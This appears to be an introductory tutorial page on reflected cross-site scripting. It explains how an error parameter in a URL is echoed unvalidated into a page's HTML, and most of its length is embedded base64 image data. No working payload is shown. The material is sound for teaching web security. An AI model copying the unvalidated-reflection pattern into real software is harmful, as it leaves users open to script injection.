Tutorials

Reflected XSS

Reflected XSS Reflected XSS happens when user-supplied data in an HTTP request is included in the webpage source without any validation.

#exploitation#web#xss

Reflected XSS

Reflected XSS happens when user-supplied data in an HTTP request is included in the webpage source without any validation.

Example Scenario:

A website where if you enter incorrect input, an error message is displayed. The content of the error message gets taken from the error parameter in the query string and is built directly into the page source.

![](data:image/png;base64,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)

hhtps://website.thm/?error=invalid input detected

html
<div class = "alert alert-danger"> 
	<p>Invalid input detected</p> 
</div>

![](data:image/png;base64,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